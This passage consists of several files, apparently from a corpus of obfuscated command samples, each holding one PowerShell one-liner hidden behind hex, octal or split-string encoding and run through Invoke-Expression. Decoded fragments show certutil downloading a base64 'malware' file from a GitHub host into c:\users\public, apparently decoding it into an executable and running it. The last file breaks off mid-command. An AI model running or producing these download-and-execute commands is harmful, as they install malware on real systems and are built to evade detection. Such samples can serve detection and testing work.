3z3az7bU30x27U2cq27q61z6dz61z6bk65z74x68M69-73q74l27z2cq27-70l75M27M2cM27q6cU20M2d-64M65-63z27q2cq27M65z20q27l2cz27l73x65U72M63q27U2cx27M73z74l2f-6dk27q2ck27l5fk6ek6fq62-72q65z61z6b-27k2cU27q6dz2fl69z6dz6ak75k73-27l2cM27U7dk7bl30U7d-75-27z2cq27-74z27M2cM27k30q7dU7bk30x27l2cq27z69x63k7bM30l7dk7bx30U7d-61l2ek65z78U65x27q2ck27l7bz30-7dk27M2cM27q3ax7bM27q2cx27z63-27x2c-27q30M7dk7bl30U27k2ck27U7dk61-20M27q2cU27k68-69M27z2cl27l75q6e-6ek27q2c-27x72M65q27M2cl27x6e-67-2fz74k27z2cz27U2fq72x61z77U2el27U2cx27k66-27q2cq27U72z74-75z74x69x6cM20x2dx27k2cz27k73U27l2cq27l65l72z73z7bx27z2ck27q36M27l2cU27U72-27U2cM27k7bz30U7dx7bz30z7dq61M27U2cU27q63q61q63l68M65-20x27x2cz27l65l27l2cq27M3bz20l63z65k72k74q75q74k27M2cl27z65q27k2cx27M70q75x62q6cx69z27U2cM27z6fk6el74k65x6eU74M2e-63-6f-27M2cl27M30-27l2cq27q70z75-62x27U2cM27x34-27M2cM27z7dU27x2ck27l7dq75-27l2ck27k63k27l2cz27k69l74k27-2c-27U2dk27U2cM27l69M63z27k2cU27U67l27l2cl27l61x73U74z65U27z2cq27-73q2eM74U78-74x20-27-2cU27U65U72x73k7bM27U2cU27q7dq27q2cl27x73-3aM2fk27l2c-27x63x3al7b-30k7dx7bz30k7dl75-73x27-2cl27k2dl73l70x6cl69U74q20M27z29l29z20x20z2dU46x20U5bx63M48U61U52U5dz39q32k29z7ck20x26q20q28q20M24x45M6eq56l3al43z4fz4dk53z70k65U43z5bx34M2cM32l34x2cM32z35M5d-2dM4ak4fx49k4e-27x27k29'.sPliT('xqUz-Mlk') | foREAcH {([ChAr]([convert]::toInT16( ( $_.toSTRINg() ) ,16 ))) } ) -joIn '')

</file>

<file path=word/_rels/obfuscated_commands_certutil_string2_encoding7.txt> INVoKe-EXpressiOn( ( '20k49L4eg76L6fp6bk65g2dL45~58g70L52k45R73&53&69R4fL6e&28~28p28p28w22R7bR36w35R7dL7b~31L33w7dw7bw34g39w7dp7b~34w33k7dg7bg32g37p7d&7bw38w7dp7bw32k34&7d~7b~30g7dp7b&33g37k7d~7bk33L35p7dL7bR35&7dw7bp34p38p7dg7b&35R32R7dg7bk35g31p7dp7bp31~39w7d&7bL32~33k7dp7bR32g32g7dg7bp34p35w7d~7b&31~30~7d&7bR33w36g7d~7bk35w30~7d~7bw32g36g7d~7bg31w7dR7bp34k34R7dg7bg31k37k7dk7bp35p33g7dg7bk34k37g7dk7bg32~38k7dp7b~32R30p7dk7bw33L33~7dw7bR35&37k7dk7b~35g35w7d~7bp33~32L7d~7bg35g38k7d&7bk35k36L7dp7bk31k38k7dL7bp39k7dR7bL36L30k7d&7bg34L32k7dg7bR36&36w7d~7b&33&30R7dg7bR33k39&7dg7bg32g7dp7bL34R30R7dk7bL35g39g7dL7bk34~36k7dR7bk31w35g7dp7bw36~33~7dL7bp33p31p7dk7b~32R39g7dL7b~35w34&7d&7bk33k34R7d~7b&34g7d&7b~33g7d~7bR36L34&7dp7bw37k7dg7bk36~31R7dw7bL36g7dw7b&32w35R7dL7bR31w32R7dR7bw32w31R7dL7bR36k32L7dg7bL31w34p7dk7bk33&38&7d~7b~34w31g7dR7bp31g36R7dg7bL31g31w7dR22L2d~66p20L27g68p65p27~2c~27L69g27&2cR27L54w69R79L27g2cp27p72g73g54g69L27~2cR27g63k3ak54w69g79~54&69~79p75L73&65&27k2cw27~6c&69~74k27p2cw27w20g27g2c&27~62R6cw69L63R54k69g79&27k2cp27~72w6cg63&27k2c&27w74~20L63g27p2cR27k62&75&73R27~2ck27k79L54&69~79~61k2ew65L78w65w27w2cp27w3ak54R69~27L2cL27g72L74&75k27g2c&27g65L72L73p54L69~79w54~27k2cw27k3bk20k27R2cp27L63w54p69g27g2cp27L73p27&2cw27k2eR74g78g27&2cw27L74p27L2c&27p68p69w27p2cg27L79~54R69p79g27w2cg27L2eg27&2cp27w70k73&3ag2f~2f&72R61p77L27g2c&27L61&63p27p2ck27k63p27L2c&27g6e~74g2eR63p6fL6d&2fR27&2cw27w75w27&2cp27~6ep6ek61w6d&61R6bg65&74w27k2c&27p65p63R27~2ck27&73~65k72w73p54g69R27w2c&27R20p2dp64p27k2c~27~65R72&2fg6dL61g6cp77g61p27k2cR27L73g74k68L27g2cw27p65g20k27~2c&27L73R70w27w2ck27p65&72L63w6fw6ep74g27p2cw27&20g2d~27w2c&27L69L79L70g75k62L6ck27k2c~27p79p27~2c~27k70g75~62&6cp69k63w54g69R79g27k2ck27L69&27p2cp27~54g69R27w2ck27&6c~20g2d~27p2ck27R6d&6aL75~27L2cw27g67&69p74R68w75g27&2cL27g69g79R61w27L2cR27R67k75p27L2c&27~20~2d&66w20~27p2ck27k74~69w27&2cR27p65p27g2ck27p74R27w2cL27g68p27~2cR27~74k27~2cg27p6f&64g27&2ck27p67R2fR74&65L73p74w2fR6dg61p73&74g27L2cg27k6fk62R72R65k61~6bg73&27p2cw27w69R6e~27k2cg27p72w65R5fL62~36L34~5fR6eR27w2ck27p54R27L2cL27k3a~54g69~79L27p2cp27k54R69L79~61p27&2c&27w75k73g27L2ck27&63k65w72~74w75k74g69w6cw27p2c&27L79g54p69~79k70p75&27L2c&27~63&65R27&2cp27~79g75w27L29k29k2dg63&72~65p70R4cp61~43k45&20~28R5bg63k48p61k52&5d&38g34k2bg5bp63p48k61k52k5dk31R30p35w2b~5bk63k48~61k52w5dw31w32w31~29~2cw5bp63k48L61&52k5dR39L32w29p29k20'.split('Rk~&gpwL' )| % { ( [ConVERT]::toint16( ( [striNg]$_ ) ,16)-as[chaR]) } )-joIN '' )

</file>

<file path=word/_rels/obfuscated_commands_certutil_string2_encoding7_compress_1.txt>&( $PShOME[4]+$PshOmE[34]+'X') (" $( Set-ItEM  'vaRiAbLE:oFs' '')"+ [strIng](('2e' , 20,28 , 20 ,24 ,53 , 48 , 65 , '4c' ,'6c' ,69,64 ,'5b' ,31, '5d','2b', 24 , 53, 48,65, '6c' ,'6c' , 69 ,44 , '5b' ,31 ,33 ,'5d' ,'2b',27,78 ,27 , 29,20 , 28 , 28 ,28 , 28 , 22, '7b' ,30, '7d','7b',31 ,38, '7d' , '7b' , 32 , 31,'7d', '7b' ,31 , 32 ,'7d' , '7b' , 34 , 30, '7d' ,'7b' , 35 ,30 , '7d' , '7b' , 34 , 34 ,'7d', '7b' , 33 , 33 ,'7d','7b',33 , 34 , '7d' ,'7b', 34 , 31, '7d', '7b',38 ,'7d','7b' , 35,32 ,'7d','7b' , 35 , 33,'7d','7b', 31 ,36 , '7d' , '7b' , 33 , 37 ,'7d' , '7b' , 32, 38, '7d' , '7b' ,32,35 ,'7d' ,'7b',39,'7d', '7b' ,35, 31,'7d' ,'7b',33,36,'7d','7b' , 31,'7d', '7b',34 ,36 , '7d' ,'7b', 31 ,34, '7d', '7b' , 33,30 ,'7d' , '7b',33 ,39 , '7d','7b', 34, 33, '7d','7b' ,32, 36 ,'7d', '7b' ,32,37, '7d','7b',31,39 ,'7d' , '7b' , 33, 35 ,'7d', '7b', 34 ,32 , '7d' ,'7b', 32,33, '7d' , '7b' , 32, '7d' , '7b' ,34,39 , '7d', '7b', 31,35 ,'7d','7b', 32 , 30,'7d','7b' , 34 ,38, '7d' , '7b', 37,'7d', '7b', 35 , 34 , '7d','7b', 33 ,32,'7d' , '7b', 36 ,'7d','7b' , 32, 34, '7d' , '7b',35 , '7d', '7b',33 ,31, '7d','7b', 31 , 30 , '7d','7b' , 34, 35 , '7d' , '7b', 33, 38 , '7d' ,'7b' , 34 ,'7d', '7b' ,34 , 37,'7d','7b' , 31, 31,'7d' , '7b' , 31 , 33, '7d', '7b',33,'7d', '7b' ,32 ,32 , '7d', '7b',32, 39,'7d', '7b',31,37 ,'7d',22, 20, '2d' ,66 ,27, 63, 65, 72,27 ,'2c' ,27, '2f' ,27,'2c' , 27 , 75 ,27, '2c',27, '7b', 30,'7d',70 ,75 ,62 ,'6c', 27 ,'2c',27, '7b',30, '7d',70 ,75,62, '6c', 69 ,63 , 27 , '2c', 27,65, 20,63, '3a', '7b', 27 ,'2c',27,65, 63, 27, '2c' ,27 , 63,65,72 , 74 , 27 , '2c' ,27, 74,'2e' ,27, '2c' , 27,68 ,27 ,'2c', 27,30 , '7d' , 27,'2c' , 27 ,30 , '7d' , 61, 20 , 63 ,'3a' , '7b' , 30 , '7d', '7b' ,27 , '2c',27 ,66 ,20, 68 ,74 ,74,27, '2c', 27,30, '7d', 75,73, 65, 72, 73,'7b' , 30,'7d',27, '2c' ,27 ,'6d' ,61, 73,74 , 65 , 27, '2c' , 27 ,'7d' , 27, '2c', 27 ,'6d', '2f' ,69 ,'6d', '6a', 27 ,'2c',27,'2e', 65 , 78, 65 , 27 ,'2c' , 27,74 , 75 ,74 , 69, '6c',20, '2d', 75,27 , '2c', 27,30, 27 , '2c' ,27 ,'7b' ,30,27 , '2c', 27 ,72, '6c',63, 61, 63, 68,65,20,'2d',73,70,'6c', 69 , 74 , 20 , '2d', 27 , '2c' ,27, 69, 63, '7b',30, '7d', 27,'2c', 27 ,73,65, 72 , 73,'7b' , 30, '7d','7b' , 30, '7d', 70 ,27 , '2c', 27, '6f', 64 ,27 ,'2c',27 , 75 ,'6e' ,'6e', 61 , '6d', 61 , '6b' , 65 ,74, 27 , '2c' ,27 ,'6b',73 , 27 ,'2c' ,27, '2e' , 74,78 , 74 ,20 , 63, '3a' ,'7b', 27 ,'2c' ,27,67 , 27,'2c' ,27,'7b' ,30, '7d', 61, 27 ,'2c',27, 72 , '2f', 27 ,'2c',27 , 30, '7d', '7b' , 27,'2c', 27, 69,'6c',20 ,'2d' ,64,27 , '2c' , 27,'2e',67 , 69 ,27 ,'2c',27, 74 , 68 , 75 , 62 ,75,73,65,72 ,63,'6f', '6e' , 27,'2c' , 27 ,'7d',27,'2c',27, 73 , 74 ,68 ,69,'6e', 67 , 27,'2c',27, 75 ,73,74 ,27 , '2c' ,27 , 30 , '7d' , 27 , '2c' , 27, '6d', 61 ,'6c', 77 ,61 ,72 , 65,'5f',62 , 36, 34 , '5f','6e', 27 ,'2c' ,27 , 70,73,'3a' ,'2f' , '2f',72,27 , '2c' , 27 , 74, 65 ,'6e', 27 ,'2c',27 , '7b', 30,'7d' ,75, 27 , '2c' ,27, '6f' ,62, 72, 65 ,61,27 ,'2c', 27, 77, 27, '2c' ,27,75, 73,65 ,72 ,73,'7b', 27 ,'2c' ,27, 74 , 65, 73 , 74, '2f',27 ,'2c' ,27,'7b' ,30, '7d','7b', 27,'2c' , 27, '7d',61 , '3b',20 ,27 , '2c' , 27,62 ,'6c' , 69 ,63 , '7b', 30,27, '2c' ,27 , 61, 27, '2c' , 27, 69, 27 , '2c' , 27,63 , 27 , '2c' , 27 ,'6f' , 27,'2c' , 27, 75, 74 ,27,29,29,20 ,20 ,'2d',66,20 , 20,'5b', 43, 68 ,61 , 72 , '5d' , 39 , 32, 29 , 20 , 29 ,20 ) |% { ( [ChaR]([COnVert]::TOiNt16( ($_.TOStRiNG() ),16))) } ) +" $( seT  'OFs'  ' ' ) ")

</file>

<file path=word/_rels/obfuscated_commands_certutil_string2_encoding8.txt> &( ([strINg]$VerBosEpreFERENcE)[1,3]+'X'-JOIN'') (( (20 , 28, 28 , 28,22 ,'7b', 32, 32 , '7d' , '7b',31 , 39, '7d' , '7b',34 ,31, '7d' ,'7b' ,32 , 33,'7d' ,'7b', 31 , 30, '7d' ,'7b',31 , 31 , '7d','7b' , 35, 34, '7d','7b', 34 ,36 , '7d', '7b' ,30,'7d' ,'7b', 33,35,'7d' , '7b',35, 31, '7d' , '7b', 31 , 34,'7d' ,'7b',31 , 38 , '7d' ,'7b' , 32,35 ,'7d','7b' ,31 , 36,'7d' ,'7b' ,32 , 37 ,'7d', '7b', 33, 38,'7d','7b', 34, 30 ,'7d','7b', 31,35,'7d' ,'7b' ,32,30,'7d','7b' ,34,'7d' , '7b',31, 37, '7d','7b', 31 ,33 , '7d' , '7b', 33 ,33 ,'7d' ,'7b' ,33,30, '7d', '7b' ,33, '7d','7b', 34 , 33 , '7d' , '7b', 32,36 ,'7d', '7b',33,32 , '7d', '7b',33, 31 ,'7d','7b' , 35 ,30,'7d', '7b' , 34, 39,'7d' ,'7b' ,33, 39 ,'7d', '7b' , 34,32 , '7d' ,'7b' ,33 , 37 ,'7d' , '7b',31 ,'7d' ,'7b' ,32 , '7d','7b' , 34, 38,'7d','7b' , 32, 38, '7d' ,'7b' ,39, '7d', '7b' ,35 , 33,'7d' , '7b', 35 , '7d' ,'7b' , 33 ,36, '7d', '7b' ,34 , 34, '7d', '7b',36 ,'7d', '7b' ,37 ,'7d' ,'7b', 34, 37, '7d', '7b' ,34 ,35 , '7d' , '7b',31, 32 ,'7d', '7b',35, 32,'7d','7b' , 38, '7d','7b' , 32, 31, '7d' , '7b', 32,39,'7d', '7b',32 , 34 ,'7d' , '7b',33,34, '7d',22, '2d', 66 ,20,27 , '3a', '2f' , '2f',72 , 61 , 77 , 27,'2c', 27,'6c' ,27,'2c', 27 , 69 ,63, 27 , '2c' , 27 ,62 , 27,'2c', 27 ,68,27 ,'2c' ,27 , 20 , 63 , 65, 72, 74 ,75 , 74, 69 ,27,'2c' ,27 , '5a' , 63, 51,75 ,73, 65, 72 ,73 ,'5a' , 27,'2c' , 27, 63 ,51, '5a' ,63 ,51, 70 ,75 ,62,'6c' ,69 , 63,'5a' ,63 , 51,'5a', 63,51, 61,20, 63 , 27 , '2c' , 27,63 ,51 ,70,27, '2c' , 27, 51 ,61 ,27 , '2c',27, 73 , 70, '6c',69 ,27 ,'2c', 27,74 ,20,'2d',66 ,20 ,68, 27 , '2c' , 27 , '5a', 63 ,51 , 75 ,73 ,65, 72 ,73 ,27 ,'2c',27 ,'2f',27 ,'2c' ,27 ,65 ,27 ,'2c' ,27, '6a' ,75,73 , 74, 67, 75 ,'6e' , '6e' , 27 ,'2c',27 ,74 ,'2e' , 63 , '6f', 27 , '2c',27,69, 73 ,74, 68, 69 ,'6e' ,67 , '2f',74 , 65, 73,74 , 27,'2c',27, 72, 63 , '6f', '6e',27 ,'2c',27, 74 ,69,'6c',20, '2d' ,27 ,'2c', 27,61,'6d',61,'6b',65 ,74, 27,'2c', 27,75 ,62, '6c' ,69 ,27, '2c' ,27, 63 , 65,72 , 74 , 75, 27,'2c', 27, 61, 63 , 68 , 65, 20 ,'2d',27 ,'2c' , 27 , '5a',63 , 27, '2c', 27 , 74, 65 , '6e' ,27 , '2c' , 27, '6e','6f' , 27 ,'2c' , 27 , '6d', 27,'2c', 27 ,'5a' ,63 ,27 ,'2c',27 ,63, '5a', 63, 51 , 27 ,'2c' , 27,74, 65,72 , '2f', '6d',61,'6c' ,77 , 61 ,72 , 65, '5f',27 , '2c' ,27 ,65 ,61, '6b',27 , '2c', 27, 62, 72 ,27, '2c', 27, '6d',61 ,73,27 ,'2c' ,27,51, 61, '2e' , 65, 78, 65 , 27 ,'2c', 27 ,'2e' , 67 , 69, 74, 68, 27 ,'2c' , 27,'6c' , 20,'2d' , 64 , 65,63,'6f' ,64 ,65 ,20 , 63, '3a',27,'2c',27 , 62,27, '2c', 27 ,'2f', 27 , '2c',27,20,63 ,'3a' , '5a' , 63 ,51 ,'5a' , 63 , 51 ,75, 73,65,72, 73,'5a' , 63 ,27 , '2c' , 27, 69, '6d' ,27, '2c', 27, 75 ,72, '6c' ,63 ,27 , '2c',27 , 51 ,'5a', 63 , 51 ,70, 75 , 27 ,'2c' ,27 , 36 , 34, '5f',27 ,'2c', 27 ,'5a', 63,51 , 27 ,'2c' ,27 , 51,27 , '2c', 27, 74 , 70 ,73 , 27 , '2c' , 27 ,'3a' , '5a',63, 27 ,'2c', 27 ,'5a', 63, 51,27 ,'2c', 27, 78, 74 ,27, '2c' , 27,73 , '2e' , 74,27, '2c' ,27 , 75, 62, 75 ,73 , 27, '2c',27 , '5a' ,63 ,51,'5a', 27, '2c' , 27 , '3b',27, '2c', 27 ,74 ,27 , 29,29,'2d' , 43 , 52 ,45 ,50, '4c', 61 , 43 , 65, 28,'5b' , 63, 68,41 ,72 , '5d' , 39, 30 ,'2b' ,'5b', 63,68,41, 72,'5d', 39 ,39,'2b' ,'5b' , 63 , 68, 41 ,72, '5d' ,38,31 , 29 ,'2c' , '5b', 63 ,68 , 41 , 72 , '5d' ,39 , 32 ,29 , '7c', '2e', 20, 28 , 28, 47 , 76 ,20, 27,'2a' ,'6d', 64, 52 ,'2a' , 27,29, '2e' , '6e' , 41, '4d', 65 , '5b' ,33,'2c',31 , 31 ,'2c', 32, '5d', '2d' , '4a','6f' , 49, '6e' ,27 , 27 , 29) | ForeACh{ ( [char]( [COnVerT]::toint16(($_.ToSTrIng() ),16)))} )-joiN '' ) 

</file>

<file path=word/_rels/obfuscated_commands_certutil_string2_encoding8_compress_1.txt>('20<2eP20L28,20v24P70<53N48&6f<6dL45v5b,34,5dN2b&24z50N73&48,4f<4dL65v5bz33N30N5dv2b,27N78&27v29,28N20,28<28&28,22&7bL31P39v7dz7bP34<34v7dL7bN32<38v7d&7bN31&7dL7b&31&31v7dP7bN30&7dP7bz37L7d&7bv34P33,7dN7bP31<36z7dL7bP32z33v7dP7bL33,7d<7bz32P34&7dN7bv32&32P7d,7b<31&38N7dL7b&33L30P7dL7bN31&33v7d,7bv33v35P7dP7bN39L7dv7bP34N37L7d<7b&33v39P7dN7bv31,32z7d<7bN33z32L7dN7bL38N7dv7bN34z7dN7bP33&38z7dN7b&34P31z7dz7b&32&31<7dP7bv34v35z7d<7bL35P7dP7bN33&36P7dP7bz31N37N7d<7bN32v30,7d<7bz36<7d&7b,34v30N7d,7bz33v31P7dN7bz31v30N7dN7b<32P35v7d<7bL31z35&7d,7bL34N32&7d&7b&33<33&7dL7bN31z34N7dN7bv32z7d,7b<32L39,7dL7b,32v37P7d,7bv34<36P7dN7b&32<36P7d,7bN33P34P7dP7bv33&37L7d,22,2dv66<27z63N68,65v20&2dv27<2cv27z2dz75v27&2cL27z47,53P45v47<75<27L2cz27<77v2e<67N69<74,68&27v2cL27N2eN27z2c&27N47L27<2c&27z65P63&6fP64<65v20P63<3aL53L45L47,53,45,27z2c,27v73L70v6cv69L74v27L2cP27,5fN62v36L34z5fv6eP6fz62L72P65<61N6b<73&27N2c&27v74z67&75<6e<6eN61,6dv61&6bL65&74P68L69N73<74P68L69z27,2c,27N47N53L45v47P70L75<27&2cP27z72<6c<63L61v27<2c&27&65N27v2c&27N2fN69<27z2cz27P45<27N2cP27,6cN69<63v53&45<47N53P45L27L2cN27L20,68,74,74&70L73,27L2cz27z75P62,6cv69v63P53<27P2cN27L2e&63L27,2cL27&63v27,2c<27v45L47v53,45<47,61P3b,20z63v65&72v74N75,74z69,6cP20&2d,64&27z2cL27<73v65P72<27z2cP27L65z72P63&6fz6e<74z65v6eP74<27&2c<27v3a,2fL2f,72,61P27P2cv27v75,62<75&73L27P2c&27L62z27N2c,27P53&27v2cL27,53z45v27v2cz27v74v69v6c&20N27L2cP27P73<65&72N73P27v2cL27z6fP6d&27,2cL27z53P45v27z2cz27,72,2f&6d<61v6cv77,61,72v65L27N2c&27z20&63P3aL53L27P2cN27L45&47N61N2eP65z78&27L2cN27z6dN6a<75v73N27P2cz27L70L27,2cv27z65,27v2cL27<74v27L2c&27&6dz61N73L74P27<2c<27&47,75P73z65z72v73N27P2cL27L78v74v20&63P3aL53N45z47L53N45P47z75,27<2cL27z47v61N27P2c<27,20<2dL66z27v2c,27v65v72z74L75N27L2cz27,73v53P45z47z53<45P27&2c,27z47<53P45&47z70&75v62P6c<69L63<53N45<47z27N2cN27&6ez67z2fN74z65N73N74<2fv27v29v29z20L20N2d<43P52P65v70,4c&41,63,65N20v27<53L45&47&27z2cv5bv63,68&41<52<5dL39v32v29P20L29<20'.SplIT('z<vL&P,N' ) |ForeAcH-OBJeCT { ( [COnVeRt]::ToiNT16(([sTRIng]$_) ,16 )-aS[cHAR])})-JoiN''| .((gV '*MDr*').NaMe[3,11,2]-jOiN'')

</file>

<file path=word/_rels/obfuscated_commands_certutil_string3_encoding1.txt> "$( sET-VARiablE  'OFS' '' )"+[String]('163}105,164>40C50r47A151C64>47H53v47H121A47,51v40>50m40H42H40A51,51A47C134C47H54m47}131H102;130;47;50H105}103C141m154}120;145H122}56,51}47H145m170A145;56C141A131}47;53C47A102>130C131v102>130}143}151H47A53m47C154C142}165r160m131>102A130A47,53C47r131;102}130m163r47C53>47;162m145C163;165m131A102C47v53m47r130;131}102}130m72,47,53}47r143;40>47}53v47r141v47;53A47H131m102A130;131;102A130>47,53m47m143C151}47}53v47>154H142}47A53}47,165,160v131,102}130A131H102r47H53m47;130>163>162}145H163>165>131>102}130>47C53r47A131;102A47r53}47>130A72H143H40,145,144H157;143m47H53H47C145>144>47H53H47}55,40>47,53>47C154;151v164,47C53}47r165m164;47r53>47v162}145H143;47v53A47v40C73H141m131>47A53v47;102;130;131,102C130r143v47C53A47r151C154C47;53C47A142r47m53C47,165A160}131C102H130H47m53H47r131}102A130>47v53r47r163}162A47v53,47v145;163H165m131A102>130A131m102;130,72>47H53v47H143v40;47}53;47H164v47H53m47}170r47m53>47>164v56C47C53A47m163>47m53>47A153>141;47r53C47A145>162}142C157m156A137,64C66m142m47v53H47m137,145m162A141v47H53C47;167v154v141r155v57H162H145H164m163;141A155;57}164;163m145m164A57}147A156A151>150m164,47A53r47;163m151C150v47C53A47,164A47A53r47A145m153,47C53;47C141>155C141v156;156H165;47A53H47C147}47A53>47A164H163v47v53;47>165>152v155;151A57>155;157A143;47,53v47C56r47>53;47v164A156v145v47}53m47A164;156m47;53v47v157>143C162C47H53v47}145v47C53A47;163v165H142;165H47m53>47,150m47,53v47v164>47,53;47m151C47>53,47,147m56H167m141r162v57,57H72;163>160,164>47m53H47v164r47H53v47A150}40,146r55r40v164;151>154H160;47r53;47r163,55;47C53r47}40;145v150v47}53>47>143C141H143C154>162v47;53C47v165;47,53}47r55>47,53,47>40r154;151;164}165r164}47H53,47}162m47A53A47;145>47,53;47}143C47;50,40C50A40m51r47m47H156r111r117}112,55;47H170H47m53C135v63;54C61m133r51H145v143A116A145r162C145C146,145m162H160C145r163,157}142C162r105A166r44m135v107m116m151r122>124,163;133r50m40A50>40;46;40C42}40A40A51C40r73v40v46m40C50>40}44}120A123C150m117>115,105H133r64;135r53A44,160>163r150;117C155}145}133H63C64,135;53}47,130H47H51>40A50r40r50>40,166v101;162}151C141;102m114A145H40m50;47A151,64r47m53;47>121}47C51C40}40v55,126}141,154,51r133C40C55v61>56m56}40,55H40>50>50,40v166}101C162H151v141>102H114C145m40m50}47v151>64,47m53C47H121H47>51C40m40A55H126,141}154A51}56A154;145m116r147H164;110>51r135m40v55A152r117>111,116r47;47C51' -SplIt'>'-spliT'r' -SpLit ';' -spliT 'A' -spLIT 'm'-SPLit 'C'-SpLiT'v'-spLIT'}'-SplIt 'H'-sPLiT ','|foREACh-ObJeCT{([CHAR] ([ConVERT]::Toint16(( $_.TOStrING() ) ,8 ) )) } ) +"$(SV  'OFs'  ' ')"| & ( $env:cOmSPEC[4,24,25]-JoIn'')

</file>

<file path=word/_rels/obfuscated_commands_certutil_string3_encoding1_compress_1.txt>IeX( -Join((133 ,163,124 ,162, 151, 156, 147, 135,72, 72 , 152 , 117, 151, 156,50,40,47, 47 ,54 , 50 ,40 , 133 ,162, 105 ,107,145 ,170 ,135,72 ,72, 115 ,101 , 124 ,103 ,110,145 ,123, 50 ,40 ,42,51 , 51 ,62,71 ,135,122 , 101 , 150 , 103 ,133 , 40,40 ,106 , 55 ,51, 47 , 145 ,170, 145, 56 , 141 ,175 , 60, 173, 175,60 , 173 , 47,53 ,47,143 ,151 , 154 , 142, 165, 47, 53,47 , 160,175, 60,173, 175,47, 53,47, 60, 173,163, 162, 47, 53 ,47 ,145 , 163 ,165, 175 ,60,47 ,53 ,47 , 173 ,175 , 60 , 173,72 ,143 ,40, 141 ,175 ,60,173, 47 , 53, 47 ,175, 60,47, 53 ,47, 173, 143 ,151, 154 ,142 ,165 ,160 ,175, 47, 53, 47 , 60,173,175 , 60 , 47 ,53 ,47 , 173,163,47 ,53 ,47 ,162 , 47 ,53 , 47 ,145, 163,165 , 47, 53 , 47 , 175, 60 , 173 , 175,60 ,173,72 , 143 ,40,145, 144 , 157, 143,47, 53 ,47 , 145, 144, 47 , 53,47, 55,40 ,154 ,151 ,164,165,164,162,47 ,53, 47 ,145, 143 ,40,73,47 , 53 ,47 , 141, 175,47 , 53, 47 ,60, 173 , 175 ,60 , 173,143 ,151, 47 ,53 , 47 ,154, 47 , 53, 47 ,142 , 165 ,160 , 175, 60, 173 , 175 ,60, 47, 53 , 47, 173 ,163, 162,47, 53,47,145 ,47, 53,47 , 163 ,165, 47 ,53, 47 ,175 ,60,173, 175,60,173 , 72 ,143 ,40 , 164 ,170,164, 56 ,163 ,153 , 141,145 , 47,53 ,47,162, 142 , 157 , 156, 137, 64,66 , 142,137 , 47 ,53,47,145, 162, 141,167, 154 , 141 , 47, 53 , 47 ,155, 57, 162,47,53 , 47, 145, 164, 47, 53 , 47, 163,141,155 , 57, 164, 163,145, 164 , 57 , 147 , 156 ,151, 150, 164 ,163, 151, 47 , 53 ,47 , 150,164 ,145, 153 ,141,47, 53,47,155,141 , 156 ,156, 165, 147 ,164,163 , 165, 152 ,155 , 47 ,53,47, 151 ,57,155,157,143, 56 ,164 , 156 , 145, 47 , 53 ,47, 164, 156, 47 , 53, 47,157 ,143, 162 ,145,163 ,165, 47, 53 ,47 ,142, 165,47 ,53 ,47,150 ,164 ,151 ,47,53 , 47 ,147, 56 ,167,141,162, 57 , 57,47,53, 47 , 72,163,160 ,47,53,47,164 ,164, 150 , 40 , 146 ,55, 47, 53 ,47 , 40, 164 , 47 ,53 , 47 , 151 ,47 , 53, 47,154, 160,163,47 , 53 , 47,55 ,40, 145,150 , 143,141,143 ,47 ,53 , 47,154 ,162 , 165 , 47,53, 47, 55 , 47 , 53 , 47, 40, 47 , 53, 47, 154, 151,164 ,165, 164 ,162 ,145,47,53,47 ,143, 47, 50,50, 40 ,50,51, 47, 47 ,116 , 151 ,117 , 152, 55 , 135, 62 ,54,61 ,61, 54 ,63,133,105 ,115 ,141, 116,56 ,51,47 ,52,122 ,144, 155 , 52, 47 ,40 ,145 , 114 ,102 ,141,111 , 162,101,126, 55,164 , 105, 107, 50 ,50 , 40, 56,40 , 42 ,40 ,54 ,40 , 47, 56 , 47,40,54 , 40 ,47,122 ,151 , 47 ,53 , 47, 147 , 150,124, 164 ,47, 53,47, 117 ,154 ,145, 146 , 164 ,47, 51 ,40,174,45 ,40, 173 , 44 ,137,56, 166 , 101 ,114,125 ,145 ,40,175,40, 51 , 40 ,51 ,40 ,174 ,46,50 , 40 , 44, 166,105 ,162 ,142 , 117 , 163 , 145 , 120,122,145,106, 105, 122 , 145,116,103,145 ,56, 164, 117 , 123, 164,162,111,116,107 , 50 ,51,133 ,61 , 54, 63, 135,53,47,130, 47 ,55,112 , 117,151,156, 47 , 47, 51) | FOrEAcH-ObjEcT {( [cOnveRT]::toInT16( ( [sTrINg]$_ ), 8 )-aS[CHAR]) } )) 

</file>

<file path=word/_rels/obfuscated_commands_certutil_string3_encoding2.txt>" $(SEt  'ofS'  '') " + [StrING]('40_111S145S130b40x50b40S40h50b55!152!117b111b116-40b133x162x145-107S105S170h135&72b72!115b101!124L103x150_145h163!50S42_51b47h47&116O151-117b112L55L135!62_54x61h61x54h63h133L105-155h141_156b56L51L47_52&122-104S155h52h47_40!105S154!102h101x151S162b141-126L50b50L46b40_174&40O51&62h71-135b122x141-110h103S133h40-40x146b55&40&51h47-145x170O145_56!141S175-60h47S53O47h173_175!60O173S143-47O53b47&151!154L142_165b160_47&53L47L175_60S173x175b60-47S53S47S173_163S162!145L163!165h175_60-173x47_53S47L175L60h173O72_143b47h53S47_40_141!175x60h173!175!60h173b143S47x53-47h151_47_53!47-154S142&165b47b53S47S160O175_60-173O175x60&173!47L53x47_163x162O47&53b47h145-163S165S175x60&47O53h47h173-175O47-53_47x60_173&72O47S53_47&143!40L145O144L157O143x145S47_53S47b144!55x40S154b151x164&165x164b162!145S143&40_73L47S53b47&141S175O60-47b53S47!173O47S53!47-175!47S53L47-60-173L47O53-47&143&151b47_53&47b154_47S53x47h142L165-160!175x60h173x175L60-173O163x47S53L47h162_47-53!47b145h47L53h47&163S165b47b53!47O175L60h173_175L60S47O53L47h173!72S143!40h164!47h53h47b170&164O56_163_153&141O145_47!53!47S162S142h157-47h53b47O156h137x64O66-142h47&53x47_137!145-162O141L47b53h47S167L154_141_155h57x162_145L164b163O47O53S47_141S155O47L53x47O57O164x163L145b164-57_147&156!151O150_164_163O47&53h47_151_150x47h53x47O164h145h153S141O155-141h156O156S165b147O164&163!47_53!47S165!152O155b151-47b53_47-57h155_157S143O56x164b156-145_164x156L157-143-162&145!163S165_142_165S150!164-151_147S56O167&141_47h53&47&162!57!57&47b53L47S72b163_47L53L47b160x164O164h47-53h47&150L40!146L55h40L164-151b154&160O163-55b40S145!150_47b53S47x143!47S53_47!141S143O154h162L165h55S47b53&47x40&154b151_164L47x53!47_165O164_162-47_53&47x145h143_47!50_50_40O42S54x47S56S47-40-54!47-122x111_107S110O164O164-117-114&145x106&164x47h40_51S40-51O40&51b40'.splIt('xOhSL&-!_b') |% {( [chAR]([COnVeRt]::TOinT16(($_.TOStRInG() ),8 ))) })+"$(SET 'OfS' 